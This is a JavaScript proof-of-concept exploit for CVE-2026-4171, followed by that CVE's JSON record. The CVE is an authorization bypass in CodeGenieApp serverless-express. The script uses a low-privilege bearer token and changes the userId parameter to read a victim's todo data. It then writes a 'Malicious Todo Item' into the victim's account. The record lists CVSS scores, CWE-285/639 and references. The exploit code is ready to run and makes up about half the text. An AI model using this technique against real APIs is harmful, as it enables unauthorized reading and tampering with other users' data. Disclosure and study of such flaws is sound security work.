CVE-2026-4171

// CVE-2026-4171 PoC - Authorization Bypass via userId Parameter Manipulation // Target: CodeGenieApp serverless-express API Endpoint const axios = require('axios'); // Configuration const TARGET_URL = 'https://target-server.com/api/todolist'; const ATTACKER_TOKEN = 'attacker_low_privilege_token'; const VICTIM_USER_ID = 'victim_user_id_123'; async function exploitAuthorizationBypass() { console.log('[+] CVE-2026-4171 Authorization Bypass Exploit'); console.log('[+] Target:', TARGET_URL); // Step 1: Normal request with attacker's own userId console.log('\n[*] Step 1: Testing with attacker userId...'); try { const normalResponse = await axios.get(`${TARGET_URL}`, { headers: { 'Authorization': `Bearer ${ATTACKER_TOKEN}`, 'Content-Type': 'application/json' }, params: { userId: 'attacker_own_user_id' } }); console.log('[+] Normal request successful:', normalResponse.status); } catch (error) { console.log('[-] Normal request failed:', error.message); } // Step 2: Exploit - Bypass authorization by manipulating userId console.log('\n[*] Step 2: Exploiting authorization bypass with victim userId...'); try { const exploitResponse = await axios.get(`${TARGET_URL}`, { headers: { 'Authorization': `Bearer ${ATTACKER_TOKEN}`, 'Content-Type': 'application/json' }, params: { userId: VICTIM_USER_ID // Manipulating userId to access victim's data } }); console.log('[+] Exploit successful - Accessed victim data!'); console.log('[+] Response status:', exploitResponse.status); console.log('[+] Response data:', JSON.stringify(exploitResponse.data, null, 2)); return true; } catch (error) { console.log('[-] Exploit failed:', error.message); return false; } } // POST request exploitation async function exploitWriteOperations() { console.log('\n[*] Step 3: Testing write operations on victim account...'); try { const writeResponse = await axios.post(`${TARGET_URL}`, { userId: VICTIM_USER_ID, data: { title: 'Malicious Todo Item', description: 'Added via authorization bypass' } }, { headers: { 'Authorization': `Bearer ${ATTACKER_TOKEN}`, 'Content-Type': 'application/json' } }); console.log('[+] Write operation successful!'); console.log('[+] Response:', JSON.stringify(writeResponse.data, null, 2)); } catch (error) { console.log('[-] Write operation failed:', error.message); } } // Execute exploit (async () => { const success = await exploitAuthorizationBypass(); if (success) { await exploitWriteOperations(); } console.log('\n[!] Exploit completed'); })();

{"cve": {"id": "CVE-2026-4171", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:57.123", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in CodeGenieApp serverless-express up to 4.17.1. Affected by this issue is some unknown functionality of the file examples/lambda-function-url/packages/api/models/TodoList.ts of the component API Endpoint. The manipulation of the argument userId leads to authorization bypass. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en CodeGenieApp serverless-express hasta la versión 4.17.1. Afectada por este problema está alguna funcionalidad desconocida del archivo examples/lambda-function-url/packages/api/models/TodoList.ts del componente API Endpoint. La manipulación del argumento userId conduce a una omisión de autorización. El ataque es posible de ser llevado a cabo de forma remota. El exploit ha sido divulgado públicamente y puede ser utilizado. El proveedor fue contactado con antelación sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/AnalogyC0de/public_exp/issues/20", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351078", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351078", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769769", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769771", "source": "[email protected]"}]}}